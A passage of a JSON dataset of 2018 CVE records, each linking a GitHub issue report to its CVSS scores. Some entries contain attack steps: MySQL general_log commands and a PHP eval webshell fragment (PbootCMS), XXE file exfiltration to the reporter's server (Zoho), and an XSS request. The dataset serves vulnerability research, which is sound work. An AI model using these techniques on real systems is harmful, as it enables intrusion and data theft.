        "description": "Invalid values like NUMBERTAG occurs in Stack during the execution.. What is wrong? When we executing our contract via py evm, we find there are strange values occur in stack, and they cause the execution ended in INVALID opcode. just run APITAG with default settings, and the APITAG output APITAG : \"stack NUMBERTAG the correct value should be byte str like b'\\x' Just want to ask if someone has already figured out this issue and what are the main concerns here. Thanks a lot.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18921",
        "Issue_Url_old": "https://github.com/phpservermon/phpservermon/issues/670",
        "Issue_Url_new": "https://github.com/phpservermon/phpservermon/issues/670",
        "Repo_new": "phpservermon/phpservermon",
        "Issue_Created_At": "2018-10-30T15:37:17Z",
        "description": "[SECURITY] Discovered vulnerability. Hi, Please, how can I report a vulnerability? regards",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18925",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5469",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5469",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-10-22T08:02:47Z",
        "description": "gogs remote command execution. Gogs version (or commit ref): newest( URLTAG Can you reproduce the bug at FILETAG [ x] Yes (provide example URL) [ ] No [ ] Not relevant Description I can login to arbitrary account. And when I logged in as admin, I can execute any command by git hooks. I just tried login to Unknown's account but do not perform command execution. APITAG APITAG As this is a very severe issue, I won't post details here. MENTIONTAG can you give me your email address and I send the details to you?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18926",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/5140",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/5140",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2018-10-22T15:14:26Z",
        "description": "gitea remote command execution with default installation. Gitea version (or commit ref): current ( URLTAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [ x] No [ ] Not relevant Description Hi, I found a issue just like URLTAG With gitea's default installation, I can authenticate as arbitrary account. But due to some server configuration, I can't reproduce in FILETAG . As this is a very severe issue, I won't post details here. Can you give me your email address and I send the details to you?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18934",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/13",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/13",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2018-10-30T15:07:52Z",
        "description": "I found a CSRF vulnerability that can getshell. ERRORTAG \u540e\u53f0\u4e0a\u4f20\u9875\u9762\u5e76\u6ca1\u6709CSRF\u9632\u62a4\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020poc ERRORTAG \u7136\u540e\u53d1\u9001\u7ed9\u7ba1\u7406\u5458\u94fe\u63a5\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5getshell.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18934",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/12",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/12",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2018-10-30T15:06:29Z",
        "description": "I found that the background can getshell. Background GETCHELL Description: The background can upload a compressed package, uncompressed without filtering, and getshell. Put a webshell in the archive and upload it. APITAG FILETAG Then we can access the corresponding directory to getshell. Code analysis See line NUMBERTAG of FILETAG ERRORTAG Only judge whether the upload is a zip archive, if it is directly decompressed, the directory to be extracted is APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18935",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/14",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/14",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2018-10-30T15:09:18Z",
        "description": "I found a CSRF vulnerability that can add a super administrator account directly. ERRORTAG APITAG CODETAG \u540e\u53f0\u4efb\u610f\u6587\u4ef6\u5220\u9664",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18936",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/15",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/15",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2018-10-30T15:10:54Z",
        "description": "I found a background arbitrary file deletion vulnerability. ERRORTAG Vulnerability analysis: Look at line NUMBERTAG of the code FILETAG ERRORTAG You can see that you want to delete the image. If it is not the image, it will be deleted. Then we can delete any file across the directory.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18937",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/82",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/82",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-11-03T06:19:20Z",
        "description": "SEGV in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . First, I run the APITAG in directory APITAG by command APITAG so that the server is set up. Then I tested APITAG in directory APITAG by command APITAG . But I got SEGV in function APITAG in APITAG . This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18939",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/159",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/159",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-11-01T03:32:16Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in wuzhicms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG and view homepage FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18942",
        "Issue_Url_old": "https://github.com/baserproject/basercms/issues/959",
        "Issue_Url_new": "https://github.com/baserproject/basercms/issues/959",
        "Repo_new": "baserproject/basercms",
        "Issue_Created_At": "2018-09-19T02:43:04Z",
        "description": "Code Execution Vulnerability. Hello\uff1a I found an arbitrary file upload vulnerability in basercms. Can lead to remote code execution. Can you provide an email address? I will give you my report. thank you!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-18950",
        "Issue_Url_old": "https://github.com/kindsoft/kindeditor/issues/289",
        "Issue_Url_new": "https://github.com/kindsoft/kindeditor/issues/289",
        "Repo_new": "kindsoft/kindeditor",
        "Issue_Created_At": "2018-11-02T09:57:46Z",
        "description": "Path Traversal vulnerability in APITAG ver NUMBERTAG Hello, The APITAG NUMBERTAG have path traversal vulnerability specifically in PATHTAG Anyone can browse the file or directory in PATHTAG folder via \u201cpath\u201d parameter without authentication. Through this method the unauthorized user can quickly view on the target host all uploaded files and exposed sensitive information. Example NUMBERTAG URLTAG FILETAG NUMBERTAG URLTAG FILETAG NUMBERTAG URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18957",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/83",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/83",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-11-05T18:08:57Z",
        "description": "Stack smashing. Summary A stack smashing was detected in FILETAG Steps to reproduce ERRORTAG APITAG URLTAG APITAG file will be expired after NUMBERTAG days.] Debugging ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18980",
        "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/5",
        "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/5",
        "Repo_new": "x-f1v3/forcve",
        "Issue_Created_At": "2018-10-30T15:13:45Z",
        "description": "Zoho APITAG Network Configuration Manager NUMBERTAG E vulnerability. Zoho APITAG Network Configuration Manager NUMBERTAG E vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn A XML External Entity injection(XXE) vulnerability exists in Zoho APITAG Network Configuration Manager NUMBERTAG ia the APITAG parameter in a APITAG GET request. My vps\u2019s FILETAG APITAG FILETAG I used the Ftp protocol to read file, it can read the file FILETAG . The FILETAG is just for test. FILETAG Then i used the poc to request my vps\u2019s FILETAG . APITAG The vulnerability exists in the APITAG ,so i tested it by the poc which was urlencoded. CODETAG In my vps ,i used the python script to open ftp protocol for accepting data FILETAG When i sent the request , I accepted the content of FILETAG in my vps. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19044",
        "Issue_Url_old": "https://github.com/acassen/keepalived/issues/1048",
        "Issue_Url_new": "https://github.com/acassen/keepalived/issues/1048",
        "Repo_new": "acassen/keepalived",
        "Issue_Created_At": "2018-10-25T15:14:03Z",
        "description": "Dbus interface allows overwriting arbitrary files and insecure permissions are used. Users can overwrite arbitrary files if APITAG or APITAG is invoked and fs.protected_symlinks is NUMBERTAG Reproducer: user: johannes APITAG NUMBERTAG tl:~> ls lah /passwd rw r r NUMBERTAG root root NUMBERTAG K Oct NUMBERTAG passwd johannes APITAG NUMBERTAG tl:~> head n NUMBERTAG passwd APITAG jobs PATHTAG johannes APITAG NUMBERTAG tl:~> ln s /passwd APITAG root: fs.protected_symlinks NUMBERTAG busctl call APITAG PATHTAG APITAG APITAG head n1 /passwd < Global definitions > APITAG and APITAG is also created mode NUMBERTAG so information can leak/be modified to/by unprivileged users",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2018-19047",
        "Issue_Url_old": "https://github.com/mpdf/mpdf/issues/867",
        "Issue_Url_new": "https://github.com/mpdf/mpdf/issues/867",
        "Repo_new": "mpdf/mpdf",
        "Issue_Created_At": "2018-09-26T12:41:37Z",
        "description": "hello,I find a security bug of mpdf. Hello, when I was do some security test. I found a vulnerability that may lead to ssrf of the server which host a html2pdf service with mPDF. The poc is as follow: APITAG APITAG world! APITAG '); $mpdf APITAG APITAG APITAG '); $mpdf APITAG the another server APITAG will get a request from above In real scenario the poc may be sent from font end . so attacker will send this to server side and trigger a SSRF bug which may lead to attack private network mPDF version NUMBERTAG OS:UBUNTU NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19053",
        "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/2",
        "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/2",
        "Repo_new": "pbootcms/pbootcms",
        "Issue_Created_At": "2018-11-06T12:59:30Z",
        "description": "Pbootcms NUMBERTAG background execution sql statement getshell vulnerability, database management module + mysql GLOBAL general_log. There is a getshell vulnerability here, the integrated database management module executes the sql statement + mysql GLOBAL general_log APITAG version NUMBERTAG APITAG default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG APITAG FILETAG in the browser and enter the account password to enter the background.. username=admin password NUMBERTAG FILETAG URLTAG Can get the absolute path of the server FILETAG PATHTAG Database management module URLTAG FILETAG Here you can enter any sql statement\uff0c Use mysql GLOBAL general_log write webshell NUMBERTAG SET GLOBAL general_log = 'On'; FILETAG APITAG the log file path SET GLOBAL general_log_file = PATHTAG FILETAG APITAG a select statement with a sentence webshell select <?php eval($_POST FILETAG FILETAG FILETAG The webshell has been written to the log file FILETAG Connect to webshell using china chopper FILETAG APITAG write to webshell via export file\uff0c because mysql defaults to secure file priv",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19056",
        "Issue_Url_old": "https://github.com/pandao/editor.md/issues/634",
        "Issue_Url_new": "https://github.com/pandao/editor.md/issues/634",
        "Repo_new": "pandao/editor.md",
        "Issue_Created_At": "2018-11-07T07:36:54Z",
        "description": "XSS vulnerability in APITAG label . this APITAG label will cause dom based XSS. if you type APITAG FILETAG which will create a link. when user click it, it will send infomation to attack.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19057",
        "Issue_Url_old": "https://github.com/sparksuite/simplemde-markdown-editor/issues/721",
        "Issue_Url_new": "https://github.com/sparksuite/simplemde-markdown-editor/issues/721",
        "Repo_new": "sparksuite/simplemde-markdown-editor",
        "Issue_Created_At": "2018-11-07T08:08:10Z",
        "description": "there was a xss both in img and a label. when We enter some strings,such as: ERRORTAG or you can use APITAG The editor will execute XSS payload When others use this editor, it is easy to get administrator rights by using XSS attack.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19089",
        "Issue_Url_old": "https://github.com/xujeff/tianti/issues/27",
        "Issue_Url_new": "https://github.com/xujeff/tianti/issues/27",
        "Repo_new": "xujeff/tianti",
        "Issue_Created_At": "2018-11-07T13:57:07Z",
        "description": "There are some XSS flaws in your project. Hello\uff0cguy\uff0ci'm sorry to tell you that your project has so many XSS flaws. first of all,the userlist module exists a storage type XSS\uff0cwhich will cause cookie Disclosure and Escalation of Privileges. the following picture is the proof of this flaws\uff1a FILETAG FILETAG the following is the descripment of this flaws according to the leak of the code. FILETAG the path of this pice of code is PATHTAG FILETAG received the value from \"controller\" and displace it without any defensive measures. that check the check the code of the \"controller\". here is the usercontroller,and we can get the request parameters from users FILETAG and it put the userinfo to the User APITAG object will be return to the \"view\",by ajax method. and we can see,there doesn't exits any defensive measures. FILETAG and secondly, in the article management mudle,there also exists a storage type xss. the following picture is the proof of this flaws: FILETAG and the following the is entry of the flaws FILETAG and thirdly,in the usermanagement mudle,there exists a reflect xss. this functional mudle is created to check the userinfo through the keyword of the user entered. FILETAG Hope you guy fix the flaws quickly,if you have some questions,please contact me with the following e mail address: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19092",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/7",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/7",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2018-11-07T12:19:43Z",
        "description": "yzmcms NUMBERTAG SS. FILETAG XSS payload: URLTAG POC: GET PATHTAG NUMBERTAG c NUMBERTAG fscript NUMBERTAG er6qt NUMBERTAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: FILETAG Cookie: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19093",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/84",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/84",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-11-07T16:41:29Z",
        "description": "SEGV in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . First, I run the APITAG in directory APITAG by command APITAG so that the server is set up. Then I tested APITAG in directory APITAG by command APITAG . But I got SEGV in function APITAG in APITAG . This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19104",
        "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/3",
        "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/3",
        "Repo_new": "bagesoft/bagecms",
        "Issue_Created_At": "2018-11-08T01:51:36Z",
        "description": "There is a CSRF vulnerability that can be used to upload arbitrary files and get server privileges.. FILETAG When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19107",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/427",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/427",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-09-01T05:37:20Z",
        "description": "APITAG heap buffer overflow at APITAG When running APITAG NUMBERTAG c6f) against psd files, , ASAN reports a heap buffer overflow error. POCs: URLTAG URLTAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19108",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/426",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/426",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-08-31T13:49:18Z",
        "description": "Infinite loop inside APITAG APITAG There seems an infinite loop inside APITAG at URLTAG NUMBERTAG c6f3). It checks APITAG at line NUMBERTAG APITAG is updated at line NUMBERTAG However sometimes APITAG may be NUMBERTAG fffffff4, making the subtraction to have no effect. A concrete input is available here URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19109",
        "Issue_Url_old": "https://github.com/xujeff/tianti/issues/29",
        "Issue_Url_new": "https://github.com/xujeff/tianti/issues/29",
        "Repo_new": "xujeff/tianti",
        "Issue_Created_At": "2018-11-07T16:33:35Z",
        "description": "There is a Incorrect accece control flaws in your project. Hello,guy,there is a Incorrect access control flaws in your project. The following is the proof of this flaws. There are two roles in the project,permission role and super administrator APITAG permission role only has the permission to change the permission of the users,and the super administrator role has all of the permissions,which contains permission management , content management , skin management . when we use super administrator role to login in,we can see: FILETAG As the picture shows,the super administrator has three permissions. When we use permission role to login in ,we can see: FILETAG as the picture show,the permission role has only one permission. How is the flaws happen? We know if the bakend controller dosen't check the permission of the role,it will cause Incorrect access control flaws. see the code of the cmscontroller the path of the cmscontroller is: PATHTAG FILETAG In this place,we can see it use the spring framework,the request of PATHTAG map to function called APITAG dosen't do permission check,which will cause the Incorect acess contol flaws. How to proof it? We request the url \" URLTAG \" directly. FILETAG We can see,the permission role can access the column list page,and it can edit the column too. FILETAG And in the skin management,there exists Incorect access control,too. We can use permission role to access the url \" URLTAG \" FILETAG we can location the flaws code in PATHTAG FILETAG it map the request PATHTAG to the function APITAG dosen't do permission check. Advice\uff1a FILETAG before excuting the main logic code of the function where the controller receiver the request from the frontend,please do permission check. Hope ,you guy fix this flaws quickly ,if you have some questions,please contact me with the e mail: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19114",
        "Issue_Url_old": "https://github.com/lifei6671/mindoc/issues/384",
        "Issue_Url_new": "https://github.com/mindoc-org/mindoc/issues/384",
        "Repo_new": "mindoc-org/mindoc",
        "Issue_Created_At": "2018-11-08T15:00:25Z",
        "description": "allow attacker unauthorized access to user account. Target mindoc APITAG modify APITAG to APITAG APITAG after modify APITAG , you're login as admin (super admin account). Solution check APITAG , only allow a zA Z NUMBERTAG Reference [astaxie/beego NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19121",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/85",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/85",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-11-08T15:40:58Z",
        "description": "SEGV in function APITAG I built libiec NUMBERTAG URLTAG in APITAG NUMBERTAG with APITAG ( APITAG before make ). I ran the APITAG in directory APITAG by command APITAG , however, there is a SEGV in function APITAG in APITAG when the selected interface is unable. Here is output with ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19122",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/86",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/86",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-11-08T15:41:19Z",
        "description": "SEGV in function APITAG I built libiec NUMBERTAG URLTAG in APITAG NUMBERTAG with APITAG ( APITAG before make ). I ran the APITAG in directory APITAG by command APITAG , however, there is a SEGV in function APITAG in APITAG when the selected interface is unable. Here is output with ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19133",
        "Issue_Url_old": "https://github.com/flarum/core/issues/1628",
        "Issue_Url_new": "https://github.com/flarum/framework/issues/1628",
        "Repo_new": "flarum/framework",
        "Issue_Created_At": "2018-11-08T10:57:36Z",
        "description": "A serious leak can get everyone's email address. Information Example URL\uff1a URLTAG Associated files\uff1a PATHTAG PATHTAG Reproduce\uff1a Step NUMBERTAG Use account to log on to this website Step NUMBERTAG Click URLTAG > Click Change Email > Fill in a different email address and correct password > Click Save Changes Step NUMBERTAG This time we can get a request and a response request: FILETAG response\uff1a FILETAG This response contains my email address Step NUMBERTAG the most important step): We can destroy JSON body and modify the ID contained in URL New Request\uff1a FILETAG After re sending this request, we will get a new response. New response: FILETAG As shown, this response contains the e mail addresses of other people. Summary: As long as we repeat the fifth step, we can download all people's mailbox addresses and some other information. This is a very dangerous BUG. Almost all versions have this flaw. I hope you can repair them as soon as possible.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19136",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/79",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/79",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-11-09T07:57:34Z",
        "description": "Cross Site Scripting Vulnerability in APITAG NUMBERTAG Multiple XSS vulnerability was discovered in domainmod NUMBERTAG There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19138",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/11",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/11",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-11-09T04:18:56Z",
        "description": "APITAG CSRF. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19148",
        "Issue_Url_old": "https://github.com/mholt/caddy/issues/2334",
        "Issue_Url_new": "https://github.com/caddyserver/caddy/issues/2334",
        "Repo_new": "caddyserver/caddy",
        "Issue_Created_At": "2018-11-05T07:59:53Z",
        "description": "Problem with the way Caddy serves multiple certificates NUMBERTAG What version of Caddy are you using ( APITAG )? Caddy NUMBERTAG dfb NUMBERTAG Sun No NUMBERTAG UTC NUMBERTAG unofficial NUMBERTAG What are you trying to do? I'm trying to fetch a certificate from my domain APITAG by using the following shell script. CODETAG NUMBERTAG What is your entire Caddyfile? CODETAG NUMBERTAG How did you run Caddy (give the full command and describe the execution environment)? APITAG I'm running Caddy on Debian NUMBERTAG stretch NUMBERTAG Please paste any relevant HTTP request(s) here. N/A NUMBERTAG What did you expect to see? The certificate of APITAG NUMBERTAG What did you see instead (give full error messages and/or log)? The certificate of either app NUMBERTAG app NUMBERTAG or APITAG The certificate changes each time you run the shell script NUMBERTAG How can someone who is starting from scratch reproduce the bug as minimally as possible NUMBERTAG Install Caddy NUMBERTAG Set up three or more subdomains on your own domain NUMBERTAG Copy my Caddyfile and adjust it as needed to fetch a certificate for each subdomain NUMBERTAG Use the provided shell script to fetch the certificate of one of the subdomains. This issue does not affect sites which are not served with Caddy. To verify this, run the same shell script on such a domain and observe that the certificate in the output is the same every time you run it and that it is the correct one for the domain. The practical relevance of this problem is that the remote control software APITAG cannot fetch the correct certificate from a subdomain that is served with Caddy because it receives a different certificate URLTAG each time it tries to fetch it.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-19148",
        "Issue_Url_old": "https://github.com/mholt/caddy/issues/1303",
